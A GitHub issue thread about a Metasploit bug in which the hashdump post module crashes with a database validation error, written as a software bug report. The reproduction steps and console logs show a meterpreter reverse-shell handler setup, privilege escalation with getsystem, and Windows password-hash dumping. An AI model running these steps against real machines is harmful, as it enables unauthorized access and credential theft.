post/windows/gather/hashdump throws error

[haxpak]

[*] Dumping password hashes...

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:79:in `raise_record_invalid'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:43:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `block in save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:220:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/persistence.rb:51:in `create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `block in create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:302:in `scoping'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:159:in `first_or_create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:446:in `block in create_credential_origin_session'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:445:in `create_credential_origin_session'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:358:in `create_credential_origin'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:95:in `block in run'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:87:in `each'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:87:in `run'

Steps to reproduce

How'd you do it?

1. Connect to client using meterpreter/x64/reverse_https
2. on meterpreter obtain system -> getsystem
3. bg
4. use post/windows/gather/hashdump
5. set session 1 (session number of active meterpreter session)
6. run

   Expected behavior

We should see the hashdump on the screen and also stored in the postgres

What happens instead?

[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/post.rb:122:in `cmd_run'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
[08/17/2019 11:25:49] [e(0)] core: /usr/bin/msfconsole:49:in `<main>'
[08/17/2019 11:25:49] [e(0)] core: Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank

OS

Kali Linux

[bwatters-r7]

Can you tell us the target OS and what your database service is (remote/local/none)?

msf5 post(windows/gather/hashdump) > db_status
[*] postgresql selected, no connection

Or

msf5 exploit(windows/smb/psexec) > db_status
[*] Connected to remote_data_service: (https://localhost:5443). Connection type: http. Connection name: local-https-data-service.

I ran it with both the remote DB connection and local disconnected against windows 10x64 and it worked for both.

meterpreter > sysinfo
Computer        : WIN10X64_1511
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/smb/psexec) > use post/windows/gather/hashdump 
msf5 post(windows/gather/hashdump) > set session 3
session => 3
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3afb4f40e2ad2583812554f817f390c5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...
[redacted]
[*] Post module execution completed
msf5 post(windows/gather/hashdump) > 

[bcoles]

This issue may be related to #10129. The second part of the issue was never resolved.

That is, the Validation failed: Session can't be blank. See log for more details. error is still thrown if the database is connected after receiving a session.

[bcook-r7]

@haxpak did you reconnect or disconnect the database while framework was running when doing this? Or was the database always connected?

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[dwelch-r7]

Closing as can't replicate

[bcoles]

Steps to reproduce:

1. Start metasploit without a database connection
2. Get a session
3. Connect to a database
4. run post/windows/gather/hashdump on the session

As per https://github.com/rapid7/metasploit-framework/issues/12208#issuecomment-523506379 :

# ./msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.200.130; set lport 1337; set ExitOnSession false; run -j; set payload windows/x64/shell/reverse_tcp; set lport 1338; run -jz"
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.200.130
lport => 1337
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:1337 
payload => windows/x64/shell/reverse_tcp
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:1338 

msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > db_status
[*] postgresql selected, no connection
msf6 exploit(multi/handler) > hosts
[-] Database not connected
msf6 exploit(multi/handler) > 
[*] Sending stage (200774 bytes) to 192.168.200.190
[*] Meterpreter session 1 opened (192.168.200.130:1337 -> 192.168.200.190:1193) at 2023-06-06 09:31:23 -0400

msf6 exploit(multi/handler) > use post/windows/gather/hashdump 
msf6 post(windows/gather/hashdump) > set session 1
session => 1
msf6 post(windows/gather/hashdump) > db_connect msf:msf@127.0.0.1:5436/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9f288f41951f8dedc8c2011fcef7627f...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
[*] Post module execution completed
msf6 post(windows/gather/hashdump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 1? [y/N]  
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9f288f41951f8dedc8c2011fcef7627f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

asdf:"asdf"

[*] Dumping password hashes...

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/validations.rb:80:in `raise_validation_error'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/validations.rb:53:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:302:in `block in save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:354:in `block in with_transaction_returning_status'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/transaction.rb:319:in `block in within_new_transaction'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `handle_interrupt'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `block in synchronize'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `handle_interrupt'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `synchronize'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/transaction.rb:317:in `within_new_transaction'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/database_statements.rb:316:in `transaction'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:350:in `with_transaction_returning_status'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:302:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/suppressor.rb:54:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/persistence.rb:55:in `create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:870:in `_create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:115:in `block in create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:881:in `_scoping'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:428:in `scoping'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:115:in `create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:124:in `first_or_create!'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:448:in `block in create_credential_origin_session'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:628:in `retry_transaction'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:447:in `create_credential_origin_session'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:360:in `create_credential_origin'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:164:in `data_service_operation'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-]   /root/Desktop/metasploit-framework/lib/msf/core/auxiliary/report.rb:40:in `create_credential'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:102:in `block in run'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:94:in `each'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:94:in `run'
[*] Post module execution completed
msf6 post(windows/gather/hashdump) >